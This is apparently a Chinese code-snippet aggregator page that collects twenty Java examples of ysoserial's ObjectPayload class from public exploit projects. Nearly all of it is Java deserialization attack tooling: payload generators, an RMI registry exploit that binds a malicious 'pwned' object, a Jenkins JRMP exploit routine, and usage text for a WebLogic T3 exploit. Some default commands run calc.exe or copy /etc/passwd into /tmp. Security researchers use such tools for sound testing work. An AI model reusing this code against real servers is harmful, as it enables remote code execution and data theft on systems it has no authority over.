本文整理汇总了Java中ysoserial.payloads.ObjectPayload类的典型用法代码示例。如果您正苦于以下问题:Java ObjectPayload类的具体用法?Java ObjectPayload怎么用?Java ObjectPayload使用的例子?那么恭喜您, 这里精选的类代码示例或许可以为您提供帮助。
ObjectPayload类属于ysoserial.payloads包,在下文中一共展示了ObjectPayload类的20个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于我们的系统推荐出更棒的Java代码示例。
示例1: printUsage
import ysoserial.payloads.ObjectPayload; //导入依赖的package包/类
private static void printUsage() {
System.err.println("Y SO SERIAL?");
System.err.println("Usage: java -jar ysoserial-[version]-all.jar [payload] '[command]'");
System.err.println(" Available payload types:");
final List<Class<? extends ObjectPayload>> payloadClasses =
new ArrayList<Class<? extends ObjectPayload>>(ObjectPayload.Utils.getPayloadClasses());
Collections.sort(payloadClasses, new Strings.ToStringComparator()); // alphabetize
final List<String[]> rows = new LinkedList<String[]>();
rows.add(new String[] {"Payload", "Authors", "Dependencies"});
rows.add(new String[] {"-------", "-------", "------------"});
for (Class<? extends ObjectPayload> payloadClass : payloadClasses) {
rows.add(new String[] {
payloadClass.getSimpleName(),
Strings.join(Arrays.asList(Authors.Utils.getAuthors(payloadClass)), ", ", "@", ""),
Strings.join(Arrays.asList(Dependencies.Utils.getDependenciesSimple(payloadClass)),", ", "", "")
});
}
final List<String> lines = Strings.formatTable(rows);
for (String line : lines) {
System.err.println(" " + line);
}
}
开发者ID:hucheat,项目名称:APacheSynapseSimplePOC,代码行数:27,代码来源:GeneratePayload.java
示例2: exploit
import ysoserial.payloads.ObjectPayload; //导入依赖的package包/类
public static void exploit(final Registry registry,
final Class<? extends ObjectPayload> payloadClass,
final String command) throws Exception {
new ExecCheckingSecurityManager().callWrapped(new Callable<Void>(){public Void call() throws Exception {
ObjectPayload payloadObj = payloadClass.newInstance();
Object payload = payloadObj.getObject(command);
String name = "pwned" + System.nanoTime();
Remote remote = Gadgets.createMemoitizedProxy(Gadgets.createMap(name, payload), Remote.class);
try {
registry.bind(name, remote);
} catch (Throwable e) {
e.printStackTrace();
}
Utils.releasePayload(payloadObj, payload);
return null;
}});
}
开发者ID:hucheat,项目名称:APacheSynapseSimplePOC,代码行数:18,代码来源:RMIRegistryExploit.java
示例3: run
import ysoserial.payloads.ObjectPayload; //导入依赖的package包/类
public static void run(final Class<? extends ObjectPayload<?>> clazz, final String[] args) throws Exception {
// ensure payload generation doesn't throw an exception
byte[] serialized = new ExecCheckingSecurityManager().callWrapped(new Callable<byte[]>(){
public byte[] call() throws Exception {
final String command = args.length > 0 && args[0] != null ? args[0] : getDefaultTestCmd();
System.out.println("generating payload object(s) for command: '" + command + "'");
ObjectPayload<?> payload = clazz.newInstance();
final Object objBefore = payload.getObject(command);
System.out.println("serializing payload");
byte[] ser = Serializer.serialize(objBefore);
Utils.releasePayload(payload, objBefore);
return ser;
}});
try {
System.out.println("deserializing payload");
final Object objAfter = Deserializer.deserialize(serialized);
} catch (Exception e) {
e.printStackTrace();
}
}
开发者ID:hucheat,项目名称:APacheSynapseSimplePOC,代码行数:26,代码来源:PayloadRunner.java
示例4: exploit
import ysoserial.payloads.ObjectPayload; //导入依赖的package包/类
public static void exploit(final Registry registry,
final Class<? extends ObjectPayload> payloadClass,
final String command) throws Exception {
new ExecCheckingSecurityManager().wrap(new Callable<Void>(){public Void call() throws Exception {
ObjectPayload payloadObj = payloadClass.newInstance();
CmdExecuteHelper cmdHelper = new CmdExecuteHelper("none", command);
Object payload = payloadObj.getObject(cmdHelper);
String name = "pwned" + System.nanoTime();
Remote remote = Gadgets.createMemoitizedProxy(Gadgets.createMap(name, payload), Remote.class);
try {
registry.bind(name, remote);
} catch (Throwable e) {
e.printStackTrace();
}
Utils.releasePayload(payloadObj, payload);
return null;
}});
}
开发者ID:pimps,项目名称:ysoserial-modified,代码行数:19,代码来源:RMIRegistryExploit.java
示例5: exploit
import ysoserial.payloads.ObjectPayload; //导入依赖的package包/类
public static void exploit(final Registry registry,
final Class<? extends ObjectPayload> payloadClass,
final String command) throws Exception {
new ExecCheckingSecurityManager().wrap(new Callable<Void>(){public Void call() throws Exception {
ObjectPayload payloadObj = payloadClass.newInstance();
Object payload = payloadObj.getObject(command);
String name = "pwned" + System.nanoTime();
Remote remote = Gadgets.createMemoitizedProxy(Gadgets.createMap(name, payload), Remote.class);
try {
registry.bind(name, remote);
} catch (Throwable e) {
e.printStackTrace();
}
Utils.releasePayload(payloadObj, payload);
return null;
}});
}
开发者ID:RickGray,项目名称:ysoserial-plus,代码行数:18,代码来源:RMIRegistryExploit.java
示例6: run
import ysoserial.payloads.ObjectPayload; //导入依赖的package包/类
public static void run(final Class<? extends ObjectPayload<?>> clazz, final String[] args) throws Exception {
// ensure payload generation doesn't throw an exception
byte[] serialized = new ExecCheckingSecurityManager().wrap(new Callable<byte[]>(){
public byte[] call() throws Exception {
final String command = args.length > 0 && args[0] != null ? args[0] : "calc.exe";
System.out.println("generating payload object(s) for command: '" + command + "'");
ObjectPayload<?> payload = clazz.newInstance();
final Object objBefore = payload.getObject(command);
System.out.println("serializing payload");
byte[] ser = Serializer.serialize(objBefore);
Utils.releasePayload(payload, objBefore);
return ser;
}});
try {
System.out.println("deserializing payload");
final Object objAfter = Deserializer.deserialize(serialized);
} catch (Exception e) {
e.printStackTrace();
}
}
开发者ID:RickGray,项目名称:ysoserial-plus,代码行数:26,代码来源:PayloadRunner.java
示例7: getExploitPayload
import ysoserial.payloads.ObjectPayload; //导入依赖的package包/类
private static byte[] getExploitPayload(String payloadType, String command){
final Class<? extends ObjectPayload> payloadClass = ObjectPayload.Utils.getPayloadClass(payloadType.split(" ")[0]);
byte[] exploitPayload = new byte[0];
try {
final ObjectPayload payload = payloadClass.newInstance();
final Object object = payload.getObject(command);
exploitPayload = Serializer.serialize(object);
} catch (Throwable e) {
System.err.println("Error while generating or serializing payload");
e.printStackTrace();
}
return exploitPayload;
}
开发者ID:NetSPI,项目名称:JavaSerialKiller,代码行数:19,代码来源:Utilities.java
示例8: run
import ysoserial.payloads.ObjectPayload; //导入依赖的package包/类
public static void run(final Class<? extends ObjectPayload<?>> clazz, final String[] args) throws Exception {
// ensure payload generation doesn't throw an exception
byte[] serialized = new ExecCheckingSecurityManager().wrap(new Callable<byte[]>(){
public byte[] call() throws Exception {
final String command = args.length > 0 && args[0] != null ? args[0] : "calc.exe";
System.out.println("generating payload object(s) for command: '" + command + "'");
final Object objBefore = clazz.newInstance().getObject(command);
System.out.println("serializing payload");
return Serializer.serialize(objBefore);
}});
try {
System.out.println("deserializing payload");
final Object objAfter = Deserializer.deserialize(serialized);
} catch (Exception e) {
e.printStackTrace();
}
}
开发者ID:NetSPI,项目名称:JavaSerialKiller,代码行数:24,代码来源:PayloadRunner.java
示例9: generate
import ysoserial.payloads.ObjectPayload; //导入依赖的package包/类
public Object generate(String type, String command) {
final Class<? extends ObjectPayload> payloadClass = getPayloadClass(type);
try {
ObjectPayload payload = payloadClass.newInstance();
Object object = payload.getObject(command);
return object;
} catch (Throwable e) {
System.err.println("Error while generating or serializing payload.");
e.printStackTrace();
System.exit(1);
return null;
}
}
开发者ID:njfox,项目名称:Java-Deserialization-Exploit,代码行数:17,代码来源:GeneratePayload.java
示例10: run
import ysoserial.payloads.ObjectPayload; //导入依赖的package包/类
public static void run(final Class<? extends ObjectPayload<?>> clazz, final String[] args) throws Exception {
// ensure payload generation doesn't throw an exception
byte[] serialized = ExecBlockingSecurityManager.wrap(new Callable<byte[]>(){
public byte[] call() throws Exception {
final String command = args.length > 0 && args[0] != null ? args[0] : "calc.exe";
System.out.println("generating payload object(s) for command: '" + command + "'");
final Object objBefore = clazz.newInstance().getObject(command);
System.out.println("serializing payload");
return serialize(objBefore);
}});
try {
System.out.println("deserializing payload");
final Object objAfter = deserialize(serialized);
} catch (Exception e) {
e.printStackTrace();
}
}
开发者ID:njfox,项目名称:Java-Deserialization-Exploit,代码行数:24,代码来源:PayloadRunner.java
示例11: main
import ysoserial.payloads.ObjectPayload; //导入依赖的package包/类
public static void main(final String[] args) {
if (args.length != 2) {
printUsage();
System.exit(USAGE_CODE);
}
final String payloadType = args[0];
final String command = args[1];
final Class<? extends ObjectPayload> payloadClass = Utils.getPayloadClass(payloadType);
if (payloadClass == null) {
System.err.println("Invalid payload type '" + payloadType + "'");
printUsage();
System.exit(USAGE_CODE);
return; // make null analysis happy
}
try {
final ObjectPayload payload = payloadClass.newInstance();
final Object object = payload.getObject(command);
PrintStream out = System.out;
Serializer.serialize(object, out);
ObjectPayload.Utils.releasePayload(payload, object);
} catch (Throwable e) {
System.err.println("Error while generating or serializing payload");
e.printStackTrace();
System.exit(INTERNAL_ERROR_CODE);
}
System.exit(0);
}
开发者ID:hucheat,项目名称:APacheSynapseSimplePOC,代码行数:30,代码来源:GeneratePayload.java
示例12: parseObjIdAndExploit
import ysoserial.payloads.ObjectPayload; //导入依赖的package包/类
private static void parseObjIdAndExploit ( final String[] args, final Class<? extends ObjectPayload> payloadClass, int jrmpPort,
InetSocketAddress isa, Exception e ) throws Exception, IOException {
String msg = e.getMessage();
int start = msg.indexOf("objID:[");
if ( start < 0 ) {
throw new Exception("Failed to get object id");
}
int sep = msg.indexOf(", ", start + 1);
if ( sep < 0 ) {
throw new Exception("Failed to get object id, separator");
}
int end = msg.indexOf("]", sep + 1);
if ( end < 0 ) {
throw new Exception("Failed to get object id, separator");
}
String uid = msg.substring(start + 7, sep);
String objNum = msg.substring(sep + 2, end);
System.err.println("* UID is " + uid);
System.err.println("* ObjNum is " + objNum);
String[] parts = uid.split(":");
long obj = Long.parseLong(objNum);
int o1 = Integer.parseInt(parts[ 0 ], 16);
long o2 = Long.parseLong(parts[ 1 ], 16);
short o3 = Short.parseShort(parts[ 2 ], 16);
exploit(new InetSocketAddress(isa.getAddress(), jrmpPort), obj, o1, o2, o3, payloadClass, args[ 2 ]);
}
开发者ID:hucheat,项目名称:APacheSynapseSimplePOC,代码行数:36,代码来源:JenkinsListener.java
示例13: main
import ysoserial.payloads.ObjectPayload; //导入依赖的package包/类
public static void main(final String[] args) throws Exception {
final String host = args[0];
final int port = Integer.parseInt(args[1]);
final String command = args[3];
final Registry registry = LocateRegistry.getRegistry(host, port);
final String className = CommonsCollections1.class.getPackage().getName() + "." + args[2];
final Class<? extends ObjectPayload> payloadClass = (Class<? extends ObjectPayload>) Class.forName(className);
// ensure payload doesn't detonate during construction or deserialization
exploit(registry, payloadClass, command);
}
开发者ID:hucheat,项目名称:APacheSynapseSimplePOC,代码行数:12,代码来源:RMIRegistryExploit.java
示例14: main
import ysoserial.payloads.ObjectPayload; //导入依赖的package包/类
public static void main(final String[] args) {
if (args.length != 3) {
printUsage();
System.exit(USAGE_CODE);
}
final String payloadType = args[0];
final String terminalType = args[1];
final String command = args[2];
final Class<? extends ObjectPayload> payloadClass = Utils.getPayloadClass(payloadType);
if (payloadClass == null) {
System.err.println("Invalid payload type '" + payloadType + "'");
printUsage();
System.exit(USAGE_CODE);
return; // make null analysis happy
}
if (!terminalTypes.contains(terminalType)) {
System.err.println("Invalid terminal type '" + terminalType + "'");
printUsage();
System.exit(USAGE_CODE);
return; // make null analysis happy
}
try {
final ObjectPayload payload = payloadClass.newInstance();
CmdExecuteHelper cmdHelper = new CmdExecuteHelper(terminalType, command);
final Object object = payload.getObject(cmdHelper);
PrintStream out = System.out;
Serializer.serialize(object, out);
ObjectPayload.Utils.releasePayload(payload, object);
} catch (Throwable e) {
System.err.println("Error while generating or serializing payload");
e.printStackTrace();
System.exit(INTERNAL_ERROR_CODE);
}
System.exit(0);
}
开发者ID:pimps,项目名称:ysoserial-modified,代码行数:39,代码来源:GeneratePayload.java
示例15: printUsage
import ysoserial.payloads.ObjectPayload; //导入依赖的package包/类
private static void printUsage() {
System.err.println("Y SO SERIAL?");
System.err.println("Usage: java -jar ysoserial-[version]-all.jar [payload type] [terminal type: cmd / bash / powershell / none] '[command to execute]'");
System.err.println(" ex: java -jar ysoserial-[version]-all.jar CommonsCollections5 bash 'touch /tmp/ysoserial'");
System.err.println("\tAvailable payload types:");
final List<Class<? extends ObjectPayload>> payloadClasses =
new ArrayList<Class<? extends ObjectPayload>>(ObjectPayload.Utils.getPayloadClasses());
Collections.sort(payloadClasses, new ToStringComparator()); // alphabetize
for (Class<? extends ObjectPayload> payloadClass : payloadClasses) {
System.err.println("\t\t" + payloadClass.getSimpleName() + " " + Arrays.asList(Dependencies.Utils.getDependencies(payloadClass)));
}
}
开发者ID:pimps,项目名称:ysoserial-modified,代码行数:13,代码来源:GeneratePayload.java
示例16: run
import ysoserial.payloads.ObjectPayload; //导入依赖的package包/类
public static void run(final Class<? extends ObjectPayload<?>> clazz, final String[] args) throws Exception {
// ensure payload generation doesn't throw an exception
byte[] serialized = new ExecCheckingSecurityManager().wrap(new Callable<byte[]>(){
public byte[] call() throws Exception {
final String command = args.length > 0 && args[0] != null ? args[0] : "cat /etc/passwd > /tmp/seraquefunfou";
System.out.println("generating payload object(s) for command: '" + command + "'");
CmdExecuteHelper cmdHelper = new CmdExecuteHelper("bash", command);
ObjectPayload<?> payload = clazz.newInstance();
final Object objBefore = payload.getObject(cmdHelper);
System.out.println("serializing payload");
byte[] ser = Serializer.serialize(objBefore);
Utils.releasePayload(payload, objBefore);
return ser;
}});
try {
System.out.println("deserializing payload");
final Object objAfter = Deserializer.deserialize(serialized);
} catch (Exception e) {
e.printStackTrace();
}
}
开发者ID:pimps,项目名称:ysoserial-modified,代码行数:28,代码来源:PayloadRunner.java
示例17: usage
import ysoserial.payloads.ObjectPayload; //导入依赖的package包/类
private static void usage() {
System.err.println("Usage: WLT3Serial [OPTIONS] REMOTE_HOST REMOTE_PORT PAYLOAD_TYPE PAYLOAD_CMD");
System.err.println("\nOptions:");
System.err.println("\t--help\t\t\t\tprint usage (you\'re lookin at it)\n");
System.err.println("\t--verbose\t\t\tVerbose output (full thrown exception output)\n");
System.err.println("\t--method=EXPLOIT_METHOD\t\tExploit Method for delivering generated ysoserial payload");
System.err.println("\t\tExploit Methods:\n\t\t\tProperty\tSend ysoserial payload as connection environment property value (Default, via javax.naming.Context.lookup(), similar to JavaUnserializeExploits weblogic.py)");
System.err.println("\t\t\tBind\t\tSend ysoserial payload as object to bind to name (via javax.naming.Context.bind(), also similar to JavaUnserializeExploits weblogic.py)");
System.err.println("\t\t\tWLBind\t\tSend ysoserial payload as WebLogic RMI object to bind to name (via weblogic.rmi.Naming.bind(), similar to ysoserial.exploit.RMIRegistryExploit)\n");
System.err.println("\t--t3s[=PROTOCOL]\t\tUse T3S (transport-encrypted) connection (Disabled by default)");
System.err.println("\t\tProtocols:\n\t\t\tTLSv1.2\n\t\t\tTLSv1.1\n\t\t\tTLSv1 (Default)\n\t\t\tSSLv3");
System.err.println("\t\t\tSSLv2 (SSLv2Hello handshake only, then fallback to SSLv3 for communication: this is an Oracle Java limitation, not a tool limitation)\n\n");
//list available ysoserial payload types, or print error on failure
System.err.println("Available Payload Types (WebLogic is usually vulnerable to \"CommonsCollectionsX\" types):");
try {
final List<Class<? extends ObjectPayload>> payloadClasses = new ArrayList<Class<? extends ObjectPayload>>(ObjectPayload.Utils.getPayloadClasses());
Collections.sort(payloadClasses, new Strings.ToStringComparator());
for (Class<? extends ObjectPayload> payloadClass : payloadClasses) {
System.err.println("\t"+payloadClass.getSimpleName());
}
System.err.println("");
} catch(NoClassDefFoundError ncdfe) {
System.err.println("\tNo ysoserial object payload classes found! Ensure that ysoserial jar file is in classpath when executing WLT3Serial!\n");
} catch(Exception e) {
System.err.println("\tUnknown Error occurred while listing ysoserial object payload classes ("+e.getClass().getName()+")!");
}
}
开发者ID:Bort-Millipede,项目名称:WLT3Serial,代码行数:29,代码来源:WLT3Serial.java
示例18: printUsage
import ysoserial.payloads.ObjectPayload; //导入依赖的package包/类
private static void printUsage() {
System.err.println("Y SO SERIAL?");
System.err.println("Usage: java -jar ysoserial-[version]-all.jar [payload type] '[command to execute]'");
System.err.println("\tAvailable payload types:");
final List<Class<? extends ObjectPayload>> payloadClasses =
new ArrayList<Class<? extends ObjectPayload>>(ObjectPayload.Utils.getPayloadClasses());
Collections.sort(payloadClasses, new ToStringComparator()); // alphabetize
for (Class<? extends ObjectPayload> payloadClass : payloadClasses) {
System.err.println("\t\t" + payloadClass.getSimpleName() + " " + Arrays.asList(Dependencies.Utils.getDependencies(payloadClass)));
}
}
开发者ID:RickGray,项目名称:ysoserial-plus,代码行数:12,代码来源:GeneratePayload.java
示例19: main
import ysoserial.payloads.ObjectPayload; //导入依赖的package包/类
public static void main(final String[] args) {
if (args.length != 2) {
printUsage();
System.exit(USAGE_CODE);
}
final String payloadType = args[0];
final String command = args[1];
final Class<? extends ObjectPayload> payloadClass = Utils.getPayloadClass(payloadType);
if (payloadClass == null) {
System.err.println("Invalid payload type '" + payloadType + "'");
printUsage();
System.exit(USAGE_CODE);
}
try {
final ObjectPayload payload = payloadClass.newInstance();
final Object object = payload.getObject(command);
PrintStream out = System.out;
Serializer.serialize(object, out);
} catch (Throwable e) {
System.err.println("Error while generating or serializing payload");
e.printStackTrace();
System.exit(INTERNAL_ERROR_CODE);
}
System.exit(0);
}
开发者ID:NetSPI,项目名称:JavaSerialKiller,代码行数:28,代码来源:GeneratePayload.java
示例20: getPayloadClass
import ysoserial.payloads.ObjectPayload; //导入依赖的package包/类
@SuppressWarnings("unchecked")
private static Class<? extends ObjectPayload> getPayloadClass(final String className) {
try {
return (Class<? extends ObjectPayload>) Class.forName(className);
} catch (Exception e1) {
}
try {
return (Class<? extends ObjectPayload>) Class.forName(GeneratePayload.class.getPackage().getName()
+ ".payloads." + className);
} catch (Exception e2) {
}
return null;
}
开发者ID:njfox,项目名称:Java-Deserialization-Exploit,代码行数:14,代码来源:GeneratePayload.java
注:本文中的ysoserial.payloads.ObjectPayload类示例整理自Github/MSDocs等源码及文档管理平台,相关代码片段筛选自各路编程大神贡献的开源项目,源码版权归原作者所有,传播和使用请参考对应项目的License;未经允许,请勿转载。 |
请发表评论